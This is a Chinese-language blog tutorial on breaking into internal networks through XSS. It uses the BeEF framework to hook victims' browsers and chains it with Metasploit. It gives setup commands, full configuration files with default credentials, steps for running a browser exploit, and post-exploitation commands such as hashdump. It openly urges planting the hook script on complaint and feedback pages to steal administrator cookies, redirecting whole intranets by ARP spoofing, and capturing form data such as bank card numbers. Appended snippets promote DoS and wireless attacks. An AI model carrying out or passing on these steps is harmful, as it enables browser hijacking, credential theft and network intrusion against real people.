whackw
whackw

内网渗透一:利用Xss漏洞进入内网

0x01:科普

Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网,配合metasploit绝对是内网渗透一大杀器。

 0x02安装

Kali linux 系统默认未安装beef,需要自行安装。

?
1
2
apt-get update
apt-get install beef-xss

 

0x03入门

0x03.1启动

主目录:

/usr/share/beef-xss

?
1
2
cd /usr/share/beef-xss
./beef

 

内网渗透一:利用Xss漏洞进入内网_第1张图片

内网渗透一:利用Xss漏洞进入内网_第2张图片

127.0.0.1:3000/ui/pannel

账号密码

beef/beef

内网渗透一:利用Xss漏洞进入内网_第3张图片

demos:Beef-Xss ip:3000/demos/butcher/index.html

测试两台主机网络通信是否正常:

内网渗透一:利用Xss漏洞进入内网_第4张图片

访问Beef demo页面

内网渗透一:利用Xss漏洞进入内网_第5张图片

demo页面嵌入了hook.js 访问->中招

0x04挂马:

在正常页面添加script标签,嵌入恶意脚本

 

加载中...

在实际渗透中(需要一个公网的IP),如何让受害者访问我们嵌有hook.js的页面呢?

 

网站反馈页面,举报页面案例:用Xss平台沦陷百度投诉中心后台

 

当然,这位同学用的是Xss平台,而不是beef,利用Beef的话,不仅能得到后台管理员的Cookie,再配合Metasploit,还能以管理员主机浏览器当做跳板,进入公司内网。

Online Browersers->右击->Use As Proxy

内网渗透一:利用Xss漏洞进入内网_第6张图片

再配合ARP攻击,MITM中间人攻击,对内网内所有Http请求重定向基本...(这里露出一个你懂的WS笑容)

Beef后台检测到有主机上线(感觉好像当年玩的灰鸽子、上兴 =。= 囧)

内网渗透一:利用Xss漏洞进入内网_第7张图片

 通过浏览器,我们可以看到目标主机的很多信息:

浏览器信息:
名称
版本
Browser UA String
Browser Platform
Windows size
插件基本信息:
Flash
VBS脚本
Web Sock
Quick Time
...
Api信息
Cookie
操作系统信息
Date 时间日期
硬件信息
Cpu (32/64)
屏幕分辨率
是否支持触屏
 

And So On

用火狐浏览器测试

加载中...

内网渗透一:利用Xss漏洞进入内网_第8张图片

Beef功能模块组件

内网渗透一:利用Xss漏洞进入内网_第9张图片

常用功能/模块

 

1 2 3 4 5 Browser:获取浏览器信息 --Hooked Domain -----Get Cookie 获取客户端Cookie信息 执行一次命令在右边显示Cookie; -----Get From Value 获取页面提交的表单信息:截获填写的银行卡信息、注册页面的用户名密码; -----Redirect Browser 浏览器重定向

 

内网渗透一:利用Xss漏洞进入内网_第10张图片

执行后,目标浏览器访问任何网站都将会被重定向到bobao.360.cn,实际渗透的时候在内网实施ARP攻击,将内网所有Http请求流量重定向到嵌入了Hook恶意脚本的页面...(在这里露出一个淫荡的笑容)

Chrome Extensions:
Debug:测试Http请求
Exploits:利用浏览器漏洞进行攻击
Host:获取受害者主机信息
Mtasploit:结合Metasploit进行渗透,这个也是本文的重点。
Network:进行Doser、ping、DNS枚举、端口扫描等等
Social Enhineering:社工模块

0x05与Metasploit联动

Beef配置文件

/usr/share/beef-xss

/config.yaml  

 

?
1
2
metasploit:
enable: false

改成 

?
1
2
metasploit:
enable: true
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
# Copyright (c) 2006 - 2013 Wade Alcorn - wade @bindshell .net
# Browser Exploitation Framework (BeEF) - http: //beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
     version: '0.4.4.5-alpha'
     debug: false
     restrictions:
         # subnet of browser ip addresses that can hook to the framework
         permitted_hooking_subnet: "0.0.0.0/0"
         # subnet of browser ip addresses that can connect to the UI
         # permitted_ui_subnet: "127.0.0.1/32"
         permitted_ui_subnet: "0.0.0.0/0"
     http:
         debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
         host: "0.0.0.0"
         port: "3000"
         # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
         # It's not advised to decrease it with tons of hooked browsers (more than 50 ),
         # because it might impact performance. Also, enable WebSockets is generally better.
         xhr_poll_timeout: 5000
         # if running behind a nat set the public ip address here
         # public : ""
         #public_port: "" # port setting is experimental
         # DNS
         dns_host: "localhost"
         dns_port: 53
         panel_path: "/ui/panel"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
         # Allow one or multiple domains to access the RESTful API using CORS
         # For multiple domains use: "http://browserhacker.com, http://domain2.com"
         restful_api:
             allow_cors: false
             cors_allowed_domains: "http://browserhacker.com"
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
           secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
           port: 61985 # WS: good success rate through proxies
           secure_port: 61986 # WSSecure
           ws_poll_timeout: 1000 # poll BeEF every second
         # Imitate a specified web server ( default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
             enable: true
             type: "apache" #supported: apache, iis
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
         https:
             enable: false
             # In production environments, be sure to use a valid certificate signed for the value
             # used in beef.http.dns_host (the domain name of the server where you run BeEF)
             key: "beef_key.pem"
             cert: "beef_cert.pem"
     database:
         # For information on using other databases please read the
         # README.databases file
         # supported DBs: sqlite, mysql, postgres
         # NOTE: you must change the Gemfile adding a gem require line like:
         #   gem "dm-postgres-adapter"
         # or
         #   gem "dm-mysql-adapter"
         # if you want to switch drivers from sqlite to postgres (or mysql).
         # Finally, run a 'bundle install' command and start BeEF.
         driver: "sqlite"
         # db_file is only used for sqlite
         db_file: "db/beef.db"
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
         db_port: 5432
         db_name: "beef"
         db_user: "beef"
         db_passwd: "beef123"
         db_encoding: "UTF-8"
     # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
     credentials:
         user:   "beef"
         passwd: "beef"
     # Autorun modules as soon the browser is hooked.
     # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
     autorun:
         enable: true
         # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
         allow_user_notify: true
     crypto_default_value_length: 80
     # Enable client-side debugging
     client:
         debug: false
     # You may override default extension configuration parameters here
     extension:
         requester:
             enable: true
         proxy:
             enable: true
         metasploit:
             enable: true
         social_engineering:
             enable: true
         evasion:
             enable: false
         console:
              shell:
                 enable: false
         ipec:
             enable: true
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# Copyright (c) 2006 - 2013 Wade Alcorn - wade @bindshell .net
# Browser Exploitation Framework (BeEF) - http: //beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost= 10.211 . 55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
     extension:
         metasploit:
             name: 'Metasploit'
             enable: true
             host: "172.16.244.129"
             port: 55552
             user: "msf"
             pass: "abc123"
             uri: '/api'
             ssl: false
             ssl_version: 'SSLv3'
             ssl_verify: true
             callback_host: "172.16.244.129"
             autopwn_url: "autopwn"
             auto_msfrpcd: false
             auto_msfrpcd_timeout: 120
             msf_path: [
               {os: 'osx' , path: '/opt/local/msf/' },
               {os: 'livecd' , path: '/opt/metasploit-framework/' },
               {os: 'bt5r3' , path: '/opt/metasploit/msf3/' },
               {os: 'bt5' , path: '/opt/framework3/msf3/' },
               {os: 'backbox' , path: '/opt/metasploit3/msf3/' },
               {os: 'win' , path: 'c:\\metasploit-framework\\' },
               {os: 'custom' , path: '/usr/share/metasploit-framework/' }
             ]

 

修改 host callback_host两参数,改为beef主机IP

重启postgresq、metasploit、服务

service postgresql restart & service metasploit restart

 

内网渗透一:利用Xss漏洞进入内网_第11张图片

msfconsole #启动Metasploit 1 load msgrpc ServerHost=172.16.244.129 Pass=abc123

 

内网渗透一:利用Xss漏洞进入内网_第12张图片

重启Beef

内网渗透一:利用Xss漏洞进入内网_第13张图片

启动beef这里提示已经载入246个metasploit的EXP,MSF更新到最新版应该有五六百个EXP

进入Beef后台(莫名成了245 =。=!)

内网渗透一:利用Xss漏洞进入内网_第14张图片

use exploit/windows/browser/ie_execcommand_uaf
show options
set srvhost 172.16.244.129
exploit/run

内网渗透一:利用Xss漏洞进入内网_第15张图片

内网渗透一:利用Xss漏洞进入内网_第16张图片

 

靶机被强行跳转到被监听的URL

内网渗透一:利用Xss漏洞进入内网_第17张图片

MSF成功监听到(但,貌似是虚拟机装的XP把这个漏洞补了,所以没产生session会话)

内网渗透一:利用Xss漏洞进入内网_第18张图片

如果XP没有打补丁,即存在这个EXP针对的漏洞,这里会产生一个session会话

session -i 1

t01645e28238ba42595.jpg

screenshot 截屏:截取遭钓鱼主机的屏幕到本地文件

sysinfo 查看系统信息

hashdump dump目标主机的用户Hash

你可能感兴趣的:(Kali)

  • 内网穿透之EW使用、判断服务器是否出网 板栗妖怪 学习内网渗透
    环境搭建使用的是下面文章的环境记一次学习--内网穿透-CSDN博客ew代理然后同样通过thinkphp漏洞写入文件,然后通过蚁剑连接然后上传ew的Linux版本,然后加权执行一层代理正向代理设置正向代理(在ubuntu上),然后kali在proxychain配置文件中连接ubuntu的192.168.244.154的代理端口反向代理在ubuntu上设置反向代理,将连接反弹到kali上的某个端口。然
  • CTF——web方向学习攻略 一则孤庸 CTF网络安全CTF
    1计算机基础操作系统:熟悉Linux命令,方便使用Kali。网络技术:HCNA、CCNA。编程能力:拔高项,有更好。2web应用HTTP协议:必须掌握web开发框架web安全测试3数据库数据库基本操作SQL语句数据库优化4刷题
  • 【CTF】MISC常用工具集锦/使用方法简介 不会代码的小徐 misc网络安全测试工具
    前言#MISC题型多变而且工具繁杂,因此自己花时间整理了一份工具列表,以便日后参考用流畅地阅读这篇博客,你可能需要:Python2.7.18+Python3.8+任何一个更高版本的Python,使用conda管理Linux虚拟机,kali即可流畅访问Google/GitHub等站点的网络通用工具#PuzzleSolver#专为misc手打造的瑞士军刀(?),整合了多种脚本(base,字频分析,pn
  • 使用Kali Linux hping3实现Dos攻击 晓时谷雨 Kalilinuxlinux运维网络安全kalilinux
    KaliLinux实现Dos攻击首先什么是Dos攻击?  DoS是DenialofService的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络宽带攻击和连通性攻击。    DoS攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访问,使
  • ubuntu/debian/kali一键更新所有软件 L0kLOkpu55Y 简单linuxdebianubuntulinux
    ubuntu/debian/kali一键更新所有软件更新软件源:sudoaptupdate一键更新所有软件:sudoaptdist-upgrade更新软件源并且更新所有软件:sudoaptupdate&&sudoaptdist-upgrade
  • Kali Linux 2020.1安装桌面 大学霸IT达人
    KaliLinux2020.1安装桌面KaliLinux2020.1安装后,可能没有安装图形界面,进入的是终端模式。此时,用户则需要安装图形界面相关的软件包。例如,这里将安装XFCE桌面。操作步骤如下所示大学霸IT达人:(1)配置软件源。执行命令:vi/etc/apt/sources.lst添加官方软件源debhttp://http.kali.org/kalikali-rollingmainnon
  • springboot集成kafka @SendTo对于转发单条消息和转发批量消息的两种情况 ddq呀 springbootkafka后端
    //当转发单条消息时,可以采用如下方式@KafkaListener(groupId="a-group",topics="a-topic")@SendTo("b-topic")publicStringconsumeA(ConsumerRecordconsumerRecord){returnconsumerRecord.value();}@KafkaListener(groupId="b-group"
  • kali 安装中文输入 unable to locate package错误解决办法 cuisidong1997 linux服务器ubuntu
    问题出在执行sudoapt-getinstall之前更换了软件源,但是却忘了update下了,于是执行下面的命令:sudoapt-getupdate等上面命令执行完后,再执行sudoaptinstallnet-tools就可以了!
  • 关键点检测笔记(3)——关键点检测的概念扫盲 战争热诚 关键点检测系列人工智能深度学习视觉检测python
    关键点检测,也被称作关键点定位或关键点对齐(keypointalignment),在不同的任务中名字可能略有差异。比如,在人脸关键点定位中会被称作facemarkalignment,在人体关键点检测中称作posealignment。通常,它的输入是一张包含目标的图像,比如人脸的图像、人体的图像或手部的图像,输出是一组预先定义好关键点的位置,比如人脸的五官与脸部轮廓、人体的各个关节、手部的各个关节等
  • 【每天一句,30天学好英语】 壹典心理咨询
    【2023-1-19】早安春夏秋冬Wehaveworkedhardtocometothisworld,butnotfortheunbeautifulandsadweseeeveryday,wehavecriedenoughwhenwewereborn,andwe,noonecangobackalive,sodon'tspendtimelow,tobelieve,tobelonely,tolovea
  • SQL 注入 漏洞测试 POP 注入 windows和Linux均可使用,已测试成功 3分云计算 火绒高级杀毒云计算及运维渗透测试安全性测试云计算kali-linuxsqlpop注入sql注入‘vbs死循环
    目录前言SQL注入SQL注入的种类常见的注入点预防措施示例POP注入的基本概念KaliLinux上使用Nmap、Metasploit和其他工具进行POP3服务的漏洞测试1.初步扫描2.检查已知漏洞3.使用Metasploit4.使用Telnet手动测试5.检查远程代码执行漏洞漏洞测试防御措施反序列化漏洞的示例防止POP注入预防措施参考示例使用PowerShell进行攻击注册表操作使用计划任务DLL
  • kubernetes解决nginx跨域问题 滴流乱转的小胖子
    官方文档出处:https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations/#enable-cors%20%E4%BD%9C%E8%80%85%EF%BC%9AKaliArch%20%E9%93%BE%E6%8E%A5%EF%BC%9Ahttps://www.imooc.com/artic
  • Linux skill命令教程:如何发送信号或报告进程状态(附实例详解和注意事项) 我要下东西噢 linuxlinux运维服务器
    Linuxskill命令介绍skill命令是用来发送信号或报告进程状态的。这个命令的默认信号是TERM。然而,这个命令已经被认为是过时和不可移植的,其命令语法定义得很差。建议使用killall,pkill,和pgrep命令代替。Linuxskill命令适用的Linux版本skill命令在大多数Linux发行版中都可以使用,包括Debian、Ubuntu、Alpine、ArchLinux、KaliL
  • 网络安全:kali之MSF工具基本使用方法 诺卡先生 网络安全学习笔记网络安全linux安全服务器linux
    1、进入MSF工具:nsfconsole2、查询漏洞利用工具:search漏洞编号3、打开工具:use工具id4、查看工具配置参数:showoptions5、查看工具的详细信息:info6、配置参数:set参数头目标主机set参数头目标端口(参数配置根据实际所缺参数为准)7、运行工具:run或者exploit@返回命令:back@新版kali已经自动配置Payload;不需要再次自己配置(当然也可
  • NSSCTF-MISC [SWPU 2019]神奇的二维码 不叫李嘉图 ctfpython前端javascript
    得到一个二维码扫一下得到得到一个类似flag的东西提交错误我们拖进kali里面看看strings看一下发现有文件这里我开始使用foremost分离分离没成功我们在使用binwalk分离成功我们看flag.jpg没有隐藏信息了看flag.doc是base64编码但是我们解码之后还有加密我们使用脚本让他循环去跑importbase64defdecode(f):n=0whileTrue:try:f=ba
  • [SWPU 2019]神奇的二维码 王八七七 安全
    1.直接扫码得到fakeflag——swpuctf{flag_is_not_here}2.使用kali中的binwalk命令,将图片中的隐藏内容显示出来打开encode.txt文件,得到一串base64的密文、解密后得到将flag.jpg解压出来得到,并放入winhex进行分析挨个查找发现18394压缩包中存在音频文件,使用刚刚解出来的密码显示密码错误查看flag.doc,猜测应该是base64套
  • buuctf-misc-[SWPU2019]神奇的二维码1 mlws1900 buuctfmiscctfjavaservletjvmctf
    下载附件,看到一个二维码利用二维码工具进行扫码,获得信息flag不在此,用winhex打开观察到多个rar文件和类似base64编码的内容看到最后看到一个mp3文件,开始文件分离(用windows系统的foremost无法分离文件)用kali的binwalk进行分离发现四个rar文件一一打开查看第一个rar文件打开一个图片和一个无法打开的f图片第二个rar文件YXNkZmdoamtsMTIzNDU
  • SWPU 神奇的二维码 【MISC】 快来吹风 ctf学习系统安全安全
    最近在跟着大佬们打ctf比赛,现在的比赛中web题都已经很难了(悲),不太适合我这种纯小白入手,个人打算从杂项开始入门,能获得一些ctf中的快乐。这是NSSCTF中2019年SWPU中的一个杂项题神奇的二维码题目是就是一个二维码:(不打码发不出来,审核说我图片违规/(ㄒoㄒ)/~~)首先是扫一扫,然而没什么收获放到kali中检测一下发现图片里面藏了4个rar文件分解后得到了四个压缩包txt文件和w
  • BUUCTF [SWPU2019]神奇的二维码 1 玥轩_521 BUUCTFMISC安全CTF笔记网络安全BUUCTFMisc
    BUUCTF:https://buuoj.cn/challenges题目描述:得到的flag请包上flag{}提交。密文:下载附件,得到一个.png图片。解题思路:1、使用QRresearch扫一下,得到“swpuctf{flag_is_not_here}”的提示。2、放到010Editor中看一下,没找到什么明显的特征。使用Kali中的binwalk工具进行检测,发现四个rar压缩包。使用bin
  • BUUCTF misc 专题(47)[SWPU2019]神奇的二维码 tt_npc 网络安全安全python
    下载附件,得到一张二维码图片,并用工具扫描(因为图片违规了,所以就不放了哈。工具的话,一般的二维码扫描都可以)swpuctf{flag_is_not_here},(刚开始出了点小差错对不住各位师傅)根据提示知道答案并不在这里,拖入winhex进行查看搜索出多个Rar,将文件放入kali进行binwalk分离出了多个rar,先查看txt文档中的内容YXNkZmdoamtsMTIzNDU2Nzg5MA
  • vulvhub-----Hacker-KID靶机 郑居中3.0 vulnhub靶机hacker-KIDweb安全python
    打靶详细教程1.网段探测2.端口服务扫描3.目录扫描4.收集信息burpsuite抓包5.dig命令6.XXE漏洞读取.bashrc文件7.SSTI漏洞8.提权1.查看python是否具备这个能力2.使用python执行exp.py脚本,如果提权成功,靶机则会开放5600端口1.网段探测┌──(root㉿kali)-[~]└─#arp-scan-lInterface:eth0,type:EN10M
  • kali从入门到入狱之使用Hping3进行DDos攻击 一朝乐 ddos网络linux
    在Kali中自带的工具Hping3,直接使用即可Hping3的常用命令如下:-c//发送的数据包的数量-d//发送到目标机器的每个数据包的大小。单位是字节-S=只发送SYN数据包-w//窗口大小-p//目的地端口号-S//表示发送的是SYN包,即不需要收到回复报文,一直发送--keep//保持源端口--fast//每秒10个包--faster//每秒100个包-–flood//洪水攻击模式,尽可能
  • kali无线渗透之蓝牙原理与探测与侦听 想拿 0day 的脚步小子 kali无线渗透渗透无线无线渗透蓝牙蓝牙渗透
    “传统蓝牙”规范在2.4GHz的ISM波段上定义了79个信道,每个信道有1MHz的带宽。设备在这些信道中以每秒1600次的频率进行跳转,换句话说,就是每微秒625次跳转。这项信道跳转技术被称为“跳频扩频”(FrequencyHoppingSpreadSpectrum,FHSS),这时的蓝牙设备中,用户最大可以达到3Mbps的通信带宽,最大约为100米的传输距离。“跳频扩频”通过在射频(RadioF
  • kali无线渗透之用wps加密模式可破解wpa模式的密码12 想拿 0day 的脚步小子 kali无线渗透wps智能路由器网络无线渗透渗透网络安全安全
    WPS(Wi-FiProtectedSetup,Wi-Fi保护设置)是由Wi-Fi联盟推出的全新Wi-Fi安全防护设定标准。该标准推出的主要原因是为了解决长久以来无线网络加密认证设定的步骤过于繁杂之弊病,使用者往往会因为步骤太过麻烦,以致干脆不做任何加密安全设定,因而引发许多安全上的问题。本章将介绍WPS加密模式。WPS(Wi-FiProtectedSetup)是一种简化无线网络配置的标准。它使用
  • kali无线渗透强力攻击工具mdk3原理和使用 想拿 0day 的脚步小子 kali无线渗透kali渗透无线渗透无线服务器网络运维
    1.BeaconFloodMode(mdk3wlanXb):BeaconFloodMode是一种攻击功能,它通过发送大量的伪造无线Beacon帧来干扰目标无线网络。Beacon帧用于在无线网络中广播网络的存在,并包含有关网络的信息,如网络名称(ESSID)、加密类型、频段等。攻击者利用这一点通过发送大量的伪造Beacon帧,使目标网络的Beacon帧过于频繁,导致网络拥塞和干扰。这可能会对网络的性
  • kali无线渗透之蓝牙攻击与原理 想拿 0day 的脚步小子 kali无线渗透无线渗透渗透蓝牙蓝牙渗透
    原理蓝牙网络中的“个人身份码”攻击传统的蓝牙设备,主要是指“蓝牙规范2.1版”以前的各版蓝牙设备,以及使用“安全简化配对”(SecureSimplePairing,SSP)协议的蓝牙设备。这些传统的蓝牙设备仅仅依赖于“个人身份码”(PersonalldentificationNumber,PIN)的有效性作为唯一的认证规则,只要通信双方的蓝牙设备使用了相同的“个人身份码",就认为通过认证,否则就认
  • kali无线渗透之WLAN窃取和注入数据2 想拿 0day 的脚步小子 kali无线渗透系统安全网络安全windows前端服务器网络安全
    WLAN帧简介WLAN(WirelessLocalAreaNetwork)帧是在无线局域网中用于数据传输的基本单位。WLAN帧的结构可以根据具体的协议标准,如IEEE802.11(Wi-Fi)而有所不同。下面是IEEE802.11标准中WLAN帧的详细介绍:1.帧控制字段(FrameControlField):帧控制字段包含16个比特,用于标识帧的类型、子类型和其他控制信息。其中包括帧的类型(管理
  • Android 源码编译和刷机ROOT 鸡蛋绝缘体
    手机基于Pixel2XL环境基于VMWARE:KaliLinux镜像基于Android10(Q)VMWARE拖拽缓存清除:rm-rf/root/.cache/vmware/drag_and_drop/*VMWARE记得随手打快照1先解锁#Checkversionshouldbesameifyouhaveusedsdkmanager#Checkversiontoensurethetoolsareru
  • 面试经验分享 | 通关某公司面试靶场 zkzq 面试经验分享职场和发展
    本文由掌控安全学院-冰封小天堂投稿0x00:探测IP首先打开时候长这个样,一开始感觉是迷惑行为,试了试/admin,/login这些发现都没有随后F12查看网络,看到几个js文件带有传参,就丢sqlmap跑了一下无果随后也反查了域名一下,发现没有域名,是阿里云的,这里突然醒悟,我第一步是信息收集。kalilinux启动,nmap启动,直接常规扫描一波,发现开启了这么多,ftp和ssh可以爆破,但因
  • 成为一名月薪2万的web安全工程师需要哪些技能? 闪现码狗
    现在web安全工程师比较火,岗位比较稀缺,现在除了一些大公司对学历要求严格,其余公司看中的大部分是能力。之前有个咨询的17岁的小伙子学习的就是相关方向,17岁,已经工作2年了……当初也是因为其他的要求比较高,所以才选择的web安全方向。那么成为一名web安全工程师需要哪些技能呢?下面就告诉你。01环境的搭建熟悉基本的虚拟机配置。Kalilinux,centos,Windows实验虚拟机自己搭建II
  • 多线程编程之卫生间 周凡杨 java并发卫生间线程厕所
    如大家所知,火车上车厢的卫生间很小,每次只能容纳一个人,一个车厢只有一个卫生间,这个卫生间会被多个人同时使用,在实际使用时,当一个人进入卫生间时则会把卫生间锁上,等出来时打开门,下一个人进去把门锁上,如果有一个人在卫生间内部则别人的人发现门是锁的则只能在外面等待。问题分析:首先问题中有两个实体,一个是人,一个是厕所,所以设计程序时就可以设计两个类。人是多数的,厕所只有一个(暂且模拟的是一个车厢)。
  • How to Install GUI to Centos Minimal sunjing linuxInstallDesktopGUI
    http://www.namhuy.net/475/how-to-install-gui-to-centos-minimal.html   I have centos 6.3 minimal running as web server. I’m looking to install gui to my server to vnc to my server. You can insta
  • Shell 函数 daizj shell函数
    Shell 函数 linux shell 可以用户定义函数,然后在shell脚本中可以随便调用。 shell中函数的定义格式如下: [function] funname [()]{ action; [return int;] } 说明: 1、可以带function fun() 定义,也可以直接fun() 定义,不带任何参数。 2、参数返回
  • Linux服务器新手操作之一 周凡杨 Linux 简单 操作
    1.whoami      当一个用户登录Linux系统之后,也许他想知道自己是发哪个用户登录的。      此时可以使用whoami命令。      [ecuser@HA5-DZ05 ~]$ whoami       e
  • 浅谈Socket通信(一) 朱辉辉33 socket
    在java中ServerSocket用于服务器端,用来监听端口。通过服务器监听,客户端发送请求,双方建立链接后才能通信。当服务器和客户端建立链接后,两边都会产生一个Socket实例,我们可以通过操作Socket来建立通信。    首先我建立一个ServerSocket对象。当然要导入java.net.ServerSocket包    ServerSock
  • 关于框架的简单认识 西蜀石兰 框架
    入职两个月多,依然是一个不会写代码的小白,每天的工作就是看代码,写wiki。 前端接触CSS、HTML、JS等语言,一直在用的CS模型,自然免不了数据库的链接及使用,真心涉及框架,项目中用到的BootStrap算一个吧,哦,JQuery只能算半个框架吧,我更觉得它是另外一种语言。 后台一直是纯Java代码,涉及的框架是Quzrtz和log4j。 都说学前端的要知道三大框架,目前node.
  • You have an error in your SQL syntax; check the manual that corresponds to your 林鹤霄
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'option,changed_ids  ) values('0ac91f167f754c8cbac00e9e3dc372
  • MySQL5.6的my.ini配置 aigo mysql
    注意:以下配置的服务器硬件是:8核16G内存    [client]   port=3306   [mysql]   default-character-set=utf8     [mysqld]   port=3306   basedir=D:/mysql-5.6.21-win
  • mysql 全文模糊查找 便捷解决方案 alxw4616 mysql
    mysql 全文模糊查找 便捷解决方案 2013/6/14 by 半仙 [email protected] 目的: 项目需求实现模糊查找. 原则: 查询不能超过 1秒. 问题: 目标表中有超过1千万条记录. 使用like '%str%' 进行模糊查询无法达到性能需求. 解决方案: 使用mysql全文索引. 1.全文索引 : MySQL支持全文索引和搜索功能。MySQL中的全文索
  • 自定义数据结构 链表(单项 ,双向,环形) 百合不是茶 单项链表双向链表
         链表与动态数组的实现方式差不多,    数组适合快速删除某个元素    链表则可以快速的保存数组并且可以是不连续的       单项链表;数据从第一个指向最后一个   实现代码:        //定义动态链表 clas
  • threadLocal实例 bijian1013 javathreadjava多线程threadLocal
    实例1: package com.bijian.thread; public class MyThread extends Thread { private static ThreadLocal tl = new ThreadLocal() { protected synchronized Object initialValue() { return new Inte
  • activemq安全设置—设置admin的用户名和密码 bijian1013 javaactivemq
            ActiveMQ使用的是jetty服务器, 打开conf/jetty.xml文件,找到 <bean id="adminSecurityConstraint" class="org.eclipse.jetty.util.security.Constraint"> <p
  • 【Java范型一】Java范型详解之范型集合和自定义范型类 bit1129 java
    本文详细介绍Java的范型,写一篇关于范型的博客原因有两个,前几天要写个范型方法(返回值根据传入的类型而定),竟然想了半天,最后还是从网上找了个范型方法的写法;再者,前一段时间在看Gson, Gson这个JSON包的精华就在于对范型的优雅简单的处理,看它的源代码就比较迷糊,只其然不知其所以然。所以,还是花点时间系统的整理总结下范型吧。   范型内容 范型集合类 范型类
  • 【HBase十二】HFile存储的是一个列族的数据 bit1129 hbase
    在HBase中,每个HFile存储的是一个表中一个列族的数据,也就是说,当一个表中有多个列簇时,针对每个列簇插入数据,最后产生的数据是多个HFile,每个对应一个列族,通过如下操作验证   1. 建立一个有两个列族的表   create 'members','colfam1','colfam2'   2. 在members表中的colfam1中插入50*5
  • Nginx 官方一个配置实例 ronin47 nginx 配置实例
    user www www; worker_processes 5; error_log logs/error.log; pid logs/nginx.pid; worker_rlimit_nofile 8192; events { worker_connections 4096;} http { include conf/mim
  • java-15.输入一颗二元查找树,将该树转换为它的镜像, 即在转换后的二元查找树中,左子树的结点都大于右子树的结点。 用递归和循环 bylijinnan java
    //use recursion public static void mirrorHelp1(Node node){ if(node==null)return; swapChild(node); mirrorHelp1(node.getLeft()); mirrorHelp1(node.getRight()); } //use no recursion bu
  • 返回null还是empty bylijinnan javaapachespring编程
    第一个问题,函数是应当返回null还是长度为0的数组(或集合)? 第二个问题,函数输入参数不当时,是异常还是返回null? 先看第一个问题 有两个约定我觉得应当遵守: 1.返回零长度的数组或集合而不是null(详见《Effective Java》) 理由就是,如果返回empty,就可以少了很多not-null判断: List<Person> list
  • [科技与项目]工作流厂商的战略机遇期 comsci 工作流
          在新的战略平衡形成之前,这里有一个短暂的战略机遇期,只有大概最短6年,最长14年的时间,这段时间就好像我们森林里面的小动物,在秋天中,必须抓紧一切时间存储坚果一样,否则无法熬过漫长的冬季。。。。         在微软,甲骨文,谷歌,IBM,SONY
  • 过度设计-举例 cuityang 过度设计
    过度设计,需要更多设计时间和测试成本,如无必要,还是尽量简洁一些好。 未来的事情,比如 访问量,比如数据库的容量,比如是否需要改成分布式  都是无法预料的 再举一个例子,对闰年的判断逻辑:   1、 if($Year%4==0) return True; else return Fasle;   2、if (   ($Year%4==0  &am
  • java进阶,《Java性能优化权威指南》试读 darkblue086 java性能优化
    记得当年随意读了微软出版社的.NET 2.0应用程序调试,才发现调试器如此强大,应用程序开发调试其实真的简单了很多,不仅仅是因为里面介绍了很多调试器工具的使用,更是因为里面寻找问题并重现问题的思想让我震撼,时隔多年,Java已经如日中天,成为许多大型企业应用的首选,而今天,这本《Java性能优化权威指南》让我再次找到了这种感觉,从不经意的开发过程让我刮目相看,原来性能调优不是简单地看看热点在哪里,
  • 网络学习笔记初识OSI七层模型与TCP协议 dcj3sjt126com 学习笔记
      协议:在计算机网络中通信各方面所达成的、共同遵守和执行的一系列约定   计算机网络的体系结构:计算机网络的层次结构和各层协议的集合。   两类服务:   面向连接的服务通信双方在通信之前先建立某种状态,并在通信过程中维持这种状态的变化,同时为服务对象预先分配一定的资源。这种服务叫做面向连接的服务。   面向无连接的服务通信双方在通信前后不建立和维持状态,不为服务对象
  • mac中用命令行运行mysql dcj3sjt126com mysqllinuxmac
    参考这篇博客:http://www.cnblogs.com/macro-cheng/archive/2011/10/25/mysql-001.html  感觉workbench不好用(有点先入为主了)。 1,安装mysql 在mysql的官方网站下载 mysql 5.5.23 http://www.mysql.com/downloads/mysql/,根据我的机器的配置情况选择了64
  • MongDB查询(1)——基本查询[五] eksliang mongodbmongodb 查询mongodb find
    MongDB查询 转载请出自出处:http://eksliang.iteye.com/blog/2174452 一、find简介 MongoDB中使用find来进行查询。 API:如下 function ( query , fields , limit , skip, batchSize, options ){.....}  参数含义: query:查询参数 fie
  • base64,加密解密 经融加密,对接 y806839048 经融加密对接
